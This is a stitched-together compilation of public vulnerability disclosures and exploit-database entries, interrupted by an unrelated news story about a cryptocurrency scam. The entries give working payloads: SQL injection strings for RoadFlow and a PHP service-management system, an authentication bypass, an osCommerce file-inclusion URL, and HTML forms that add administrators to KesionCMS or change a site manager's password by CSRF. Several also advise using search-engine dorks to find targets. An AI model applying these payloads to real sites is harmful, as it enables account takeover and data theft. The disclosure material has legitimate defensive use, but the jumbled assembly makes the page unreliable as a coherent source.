Prestashop winbizpayment <= 1.0.2 is vulnerable to Incorrect Access Control via modules/winbizpayment/downloads/download.php.

CVE-2023-30198: PrestaShop/Tools.php at 6c05518b807d014ee8edb811041e3de232520c28 · PrestaShop/PrestaShop

A vulnerability, which was classified as critical, has been found in RoadFlow Visual Process Engine .NET Core Mvc 2.13.3. Affected by this issue is some unknown functionality of the file /Log/Query?appid=0B736354-9473-4D66-B9C0-15CAC149EB05&tabid=tab_0B73635494734D66B9C015CAC149EB05 of the component Login. The manipulation of the argument sidx/sord leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-231230 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

Permalink

Cannot retrieve contributors at this time

1、Use the default account to log in normally  2、Click log query, use burpsuite to capture packets   3、package： POST /RoadFlowCore/Log/Query?appid=0B736354-9473-4D66-B9C0-15CAC149EB05&tabid=tab\_0B73635494734D66B9C015CAC149EB05 HTTP/1.1 Host: 127.0.0.1:5000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0 Accept: application/json, text/javascript, _/_; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 116 Origin: http://127.0.0.1:5000 Connection: close Referer: http://127.0.0.1:5000/RoadFlowCore/Log/Index?appid=0B736354-9473-4D66-B9C0-15CAC149EB05&rf\_appopenmodel=0&tabid=tab\_0B73635494734D66B9C015CAC149EB05 Cookie: rf\_login\_uniqueid=C9965CEC-493C-4433-8F81-84267ECAF9BD; rf\_core\_rootdir=; usermenutype=1; rf\_core\_theme=blue; roadflowcorepagesize=15; RoadFlowCore.Session=CfDJ8EvfmoetFvtFn34qbL0bhQi732bT78siA0k9IyuNV7izzD2HaiCszYysIMm3IHL9tKRQYFo3z2VcOb%2Ba7grHTmnatCG6w2h3Ve0ZUYoFBB%2Fnug6MXcNvN6CJrON40GKlvi5uELoiS8mWsxVTkmR1Bpe%2Fn2KtT%2FGnfrgDuJSlMd8T; .AspNetCore.Antiforgery.SqRQVSlQWbo=CfDJ8EvfmoetFvtFn34qbL0bhQiNLjtoCHp8DTQQSTvj4Wzi3rHnvueNRx4iL7I9mxKb1WgacCXdIFkCxyXh520nuIsS3\_NqXifucqHDrhneFPLFspDzv8GeNY-F9Sr7xbTcCfiEOUKwVDAgHp8tTx5DRJI Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin

appid=0B736354-9473-4D66-B9C0-15CAC149EB05&\_search=false&nd=1686014077522&rows=20000&page=1&sidx=WriteTime&sord=desc

4、There is an error injection in the sidx parameter of this package, replace the value of sidx "extractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281205948442%29%29%29"，Successfully broke the md5 value.  5、There is time injection in the sord parameter of this package, replace the value of sord with "desc%2C%28select%2Afrom%28select%2Bsleep%2810%29union%2F%2A%2A%2Fselect%2B1%29a%29"，Successfully delayed by 10 seconds.  6、Use the sqlmap tool to exploit.

CVE-2023-3208: vulhub/RoadFlow.md at master · yangxixx/vulhub

Sourcecodester Service Provider Management System v1.0 is vulnerable to SQL Injection via the ID parameter in /php-spms/?page=services/view&id=2

    # Exploit Title: Service Provider Management System v1.0 - SQL Injection
    # Date: 2023-05-23
    # Exploit Author: Ashik Kunjumon
    # Vendor Homepage: https://www.sourcecodester.com/users/lewa
    # Software Link: https://www.sourcecodester.com/php/16501/service-provider-management-system-using-php-and-mysql-source-code-free-download.html
    # Version: 1.0
    # Tested on: Windows/Linux
    
    1. Description:
    
    Service Provider Management System v1.0 allows SQL Injection via ID
    parameter in /php-spms/?page=services/view&id=2
    Exploiting this issue could allow an attacker to compromise the
    application, access or modify data,
    or exploit the latest vulnerabilities in the underlying database.
    
    Endpoint: /php-spms/?page=services/view&id=2
    
    Vulnerable parameter: id (GET)
    
    2. Proof of Concept:
    ----------------------
    
    Step 1 - By visiting the url:
    http://localhost/php-spms/?page=services/view&id=2 just add single quote to
    verify the SQL Injection.
    Step 2 - Run sqlmap -u " http://localhost/php-spms/?page=services/view&id=2"
    -p id --dbms=mysql
    
    SQLMap Response:
    ----------------------
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: page=services/view&id=1' AND 8462=8462 AND 'jgHw'='jgHw
    
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
    BY clause (FLOOR)
        Payload: page=services/view&id=1' AND (SELECT 1839 FROM(SELECT
    COUNT(*),CONCAT(0x7178717171,(SELECT
    (ELT(1839=1839,1))),0x7176786271,FLOOR(RAND(0)*2))x FROM
    INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cqhk'='Cqhk
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: page=services/view&id=1' AND (SELECT 1072 FROM
    (SELECT(SLEEP(5)))lurz) AND 'RQzT'='RQzT

CVE-2023-34581: OffSec’s Exploit Database Archive

A previously undetected cryptocurrency scam has leveraged a constellation of over 1,000 fraudulent websites to ensnare users into a bogus rewards scheme since at least January 2021.
"This massive campaign has likely resulted in thousands of people being scammed worldwide," Trend Micro researchers said in a report published last week, linking it to a Russian-speaking threat actor named "Impulse

A previously undetected cryptocurrency scam has leveraged a constellation of over 1,000 fraudulent websites to ensnare users into a bogus rewards scheme since at least January 2021.

"This massive campaign has likely resulted in thousands of people being scammed worldwide," Trend Micro researchers said in a report published last week, linking it to a Russian-speaking threat actor named "Impulse Team."

"The scam works via an advanced fee fraud that involves tricking victims into believing that they've won a certain amount of cryptocurrency. However, to get their rewards, the victims would need to pay a small amount to open an account on their website."

The compromise chain starts with a direct message propagated via Twitter to lure potential targets into visiting the decoy site. The account responsible for sending the messages has since been closed.

The message urges recipients to sign up for an account on the website and apply a promo code specified in the message to win a cryptocurrency reward amounting to 0.78632 bitcoin (about $20,300).

But once an account is set up on the fake platform, users are requested to activate the account by making a minimal deposit worth 0.01 bitcoin (about $258) to confirm their identity and complete the withdrawal.

"While relatively sizable, the amount necessary to activate the account pales in comparison to what users would get in return," the researchers noted. "However, as expected, recipients never get anything in return when they pay the activation amount."

A public Telegram channel that records every payment made by the victims shows that the illicit transactions have yielded the actors a little over $5 million between December 24, 2022, and March 8, 2023.

Trend Micro said it unearthed hundreds of domains related to this fraud, with some of them being active as far back as 2016. All the fake websites belong to an affiliate "scam crypto project" codenamed Impulse that's been advertised on Russian cybercrime forums since February 2021.

Like ransomware-as-a-service (RaaS) operations, the venture requires affiliate actors to pay a fee to join the program and share a percentage of the earnings with the original authors.

To lend the operation a veneer of legitimacy, the threat actors are believed to have create a lookalike version of a known anti-scam tool known as ScamDoc, which assigns a trust score for different websites, in a plausible attempt to pass off the sketchy crypto services as trustworthy.

Trend Micro said it also stumbled upon private messages, online videos, and ads on other social networks such as TikTok and Mastodon, indicating that the affiliates are using a wide range of methods to advertise the fraudulent activity.

"The threat actor streamlines operations for its affiliates by providing hosting and infrastructure so they can run these scam websites on their own," the researchers said. "Affiliates are then able to concentrate on other aspects of the operation, such as running their own advertising campaigns."

UPCOMING WEBINAR

🔐 Mastering API Security: Understanding Your True Attack Surface

Discover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!

Join the Session

The findings come weeks after Akamai took the wraps off a renewed Romanian cryptojacking campaign named Diicot (previously Mexals) that employs a Golang-based Secure Shell (SSH) worm module and a new LAN spreader for propagation.

Then last month, Elastic Security Labs detailed the use of an open-source rootkit called r77 to deploy the XMRig cryptocurrency miner in several Asian countries.

"r77's primary purpose is to hide the presence of other software on a system by hooking important Windows APIs, making it an ideal tool for cybercriminals looking to carry out stealthy attacks," the researchers said.

"By leveraging the r77 rootkit, the authors of the malicious crypto miner were able to evade detection and continue their campaign undetected."

It's worth pointing out that the r77 rootkit is also incorporated in SeroXen, a nascent variant of the Quasar remote administration tool that's being sold for only $30 for a monthly license or $60 for a lifetime bundle.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Beware: 1,000+ Fake Cryptocurrency Sites Trap Users in Bogus Rewards Scheme

PhotoSwipe version 5.3.7 suffers from an arbitrary file download vulnerability.

    ===========================================================================================| # Title     : PhotoSwipe 5.3.7 Arbitrary File Download Vulnerability                    || # Author    : indoushka                                                                 || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)     | | # Vendor    : https://photoswipe.com/                                                   |  | # Dork      :                                                                           |===========================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : download?path=/uploads/images/support/download/index.php[+] Payload enables you to download empty files .[+] https://127.0.0.1/novakon.com.tw/common/frontend/download?path=/uploads/images/support/download/index.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

PhotoSwipe 5.3.7 Arbitrary File Download

PES Pro CMS version 1.9.7 suffers from an add administrator vulnerability.

    ====================================================================================================================================| # Title     : PES Pro CMS - v1.9.7 Reinstall add admin Vulnerability                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : http://download1580.mediafire.com/3e3q3pr2g20g/jt6w98fdfyqk0s1/pes.zip                                             |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload : /install/?step=4 =====> http://127.0.0.1/zarabiarapl/install/?step=4[+] Set new user or password .[+] Admin panel : http://zarabiara.pl/admin-panel/index.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |                                                                                                                                      |=======================================================================================================================================

PES Pro CMS 1.9.7 Add Administrator

KesionCMS X version 9.5 suffers from an unauthenticated add administrator vulnerability.

====================================================================================================================================  
| # Title     : KesionCMS X9.5 Reinstall Add Admin Vulnerability                                                                   |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit)                                             |   
| # Vendor    : https://www.kesion.com/                                                                                            |    
| # Dork      : Powered by KesionCMS                                                                                               |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Use payload : /install/index.asp

[+] http://127.0.0.1/install/?action=s4 = add your information to login

[+] copy & past this exploit listed below into a text file and save it with ".html" extension

[+] Exploit :

[+] @t Line 09 & 16 change the domain name of target

    <head><title>  
            Hacked By indoushka  
        </title><link href="http://www.tzxdcpv.com/install/images/guide.css" rel="stylesheet" />  
        <script src="http://www.tzxdcpv.com/ks_inc/jquery.js" type="text/javascript"></script>  
    <script src="http://www.tzxdcpv.com/ks_inc/common.js" type="text/javascript"></script>  
    <script src="http://www.tzxdcpv.com/ks_inc/lhgdialog.js"></script>  
        </head>  
        <body>    
 <form name="form" method="post" action="http://127.0.0.1/install/index.asp" id="form">  
        <div class="guide">  
         <div class="guidetitle">  
                </div>  
                <div class="clear"></div>  
              </div>  
          <div class="clear"></div>  
 <input type="hidden" name="action" value="http://www.tzxdcpv.com/install/?action=s5"  />  
       <input type="hidden" name="DBlx" value=""  />  
       <input type="hidden" name="CkbData" value=""  />

              <input type="hidden" name="TxtDBName_a" value=""  />  
       <input name="TxtDBService" value="" id="TxtDBService" class="text" type="hidden"  />  
       <input name="TxtDBName" value="" id="TxtDBName" class="text" type="hidden" />  
       <input name="TxtDBUser" value="" id="TxtDBUser" class="text" type="hidden" />  
       <input name="TxtDBPass" value="" id="TxtDBPass" class="text" type="hidden"  />

      <div id="http://www.tzxdcpv.com/install/?action=s4">

           </div>  
     <div class="clear"></div>  
     <div class="sjlist">  
      <h5>网站参数配置</h5>  
      <ul>  
        <li><span>网站名称：</span><input name="TxtSiteName" value="科兴网络开发" id="TxtSiteName" class="text" type="text"><font color="red">*</font> 如：Kesion官方站</li>  
        <li><span>网站域名：</span><input name="TxtSiteUrl" value="http://cxsecurity.com" id="TxtSiteUrl" class="text" type="text"><font color="red">*</font> 后面不要带“/”。   
        如http://www.kesion.com。  
        </li>  
        <li><span>安装目录：</span><input name="TxtInstallDir" value="/" id="TxtInstallDir" class="text" type="text"><font color="red">*</font> 后面不要带“/”。   
        系统会自动获取，建议不要修改。  
        </li>  
        <li><span>授 权 码：</span><input name="TxtSiteKey" value="0" id="TxtSiteKey" class="text" type="text">  
        免费版本用户请留空或填“0”。  
        </li>  
        <li><span>后台目录：</span><input name="TxtManageDir" value="Admin/" id="TxtManageDir" class="text" type="text"><font color="red">*</font> 如：Manage,Admin，后面必须带"/"符号。</li>  
                <li><span> 后台登录验证码：</span>  
                 <input type="radio" name="isCode_a" value="True"  /> 启用    
                 <input type="radio" value="False"  name="isCode_a" checked="checked"/> 不启用  
                </li>

                       <li><span>管理认证码：</span>  
                 <input type="radio" name="isCode" value="True" onclick="$('#rzm').show()"/> 启用  <input onclick="$('#rzm').hide()" type="radio" value="False"  name="isCode" checked="checked"   /> 不启用   
                <font id="rzm" style="display:none">认证码：<input name="TxtManageCode" value="8888"  id="TxtManageCode" class="text" style="width:100px;" type="text"></font></li>  
      </ul>  
      <div class="clear"></div>  
      <h5>填写管理员信息</h5>  
      <ul>  
        <li><span>管理员账号：</span><input name="TxtUserName" value="admin"  id="TxtUserName" class="text" type="text"><font color="red">*</font> </li>  
        <li><span>管理员密码：</span><input name="TxtUserPass" value="admin888" id="TxtUserPass" class="text" type="text"><font color="red">*</font> 管理员密码不能为空</li>  
        <li><span>重复密码：</span><input name="TxtReUserPass" value="admin888" id="TxtReUserPass" class="text" type="text"></li>  
      </ul>  
      <div class="clear blank10"></div>

            <div style="padding:5px">  
      <input name="Button1" value="下一步" onClick="return(doCheck());" id="Button1" class="btnbg" type="submit">  
      </div>  
    </div>

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
                                                                                                                                      |  
=======================================================================================================================================

KesionCMS X 9.5 Add Administrator

Pannres-Idence CMS version 7.3 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Pannres-idence CMS 7.3 CSRF Vulnerability                                                                          |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             |   
| # Vendor    : https://codecanyon.net/item/pannresidence-classified-ads-php-script/19960675?s_rank=189                            |    
| # Dork      : "Bylancer, All right reserved"                                                                                     |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html Will modify the password for the site manager, as well as change the e-mail.

[+] save code as poc.html .

<form class="form-horizontal" action="http://127.0.0.1/pannresidencecom/backend/add_newPassword.php" name="form2" id="form2">

                            <fieldset>

                                <div class="form-group">  
                                    <label class="col-md-2 control-label" for="text-field">NEW PASSWORD</label>  
                                    <div class="col-md-10" id="thumbsite">  
                                        <input name="password" id="password" class="form-control" placeholder="Your new password." type="password">  
                                    </div>  
                                </div>

                                <div class="form-group">  
                                    <label class="col-md-2 control-label" for="text-field">RE NEW PASSWORD<meta></label>  
                                    <div class="col-md-10" id="thumbsite">  
                                        <input name="re_password" id="re_password" class="form-control" placeholder="Re password again." type="password" onchange="check_pass()">

                                    </div>  
                                </div>

                                                <div class="form-group">  
                                    <label class="col-md-2 control-label" for="text-field">CHANGE EMAIL</label>  
                                    <div class="col-md-10" id="thumbsite">  
                                        <input name="newEmail" value="" class="form-control" type="email">

                                    </div>  
                                </div>

                                                            </fieldset>

                            <div class="">  
                                <div class="row">  
                                    <div class="col-md-12">  
                                        <button class="btn btn-default" type="clear">  
                                            Cancel  
                                        </button>

                                        <button class="btn btn-primary" id="submit-form" name="submit-form" type="submit">  
                                            <i class="fa fa-save"></i>  
                                            Submit  
                                        </button>  
                                    </div>  
                                </div>  
                            </div>

                        </form>

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
                                                                                                                                      |  
=======================================================================================================================================

Pannres-Idence CMS 7.3 Cross Site Request Forgery

Ormesson-Immobilier CMS version 8 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Ormesson-immobilier cms v8 Auth By Pass Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.easysolutions.lu/                                                                                      |  | # Dork      : powered by Sogis.be ©                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user & Pass : 1' or 1=1 -- -[+] http://127.0.0.1/ormesson/MyGestion/#/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Ormesson-Immobilier CMS 8 SQL Injection

osCommerce version 4 suffers from a local file inclusion vulnerability.

    ====================================================================================================================================| # Title     : oscommerce V4 LFI Vulnerability                                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://www.oscommerce.com/                                                                                        |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 62  : https://github.com/osCommerce/osCommerce-V4/blob/main/install/index.php[+] http://locqlhost/install/index.php?rootPath=../../includes/local/configure.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Tag

#windows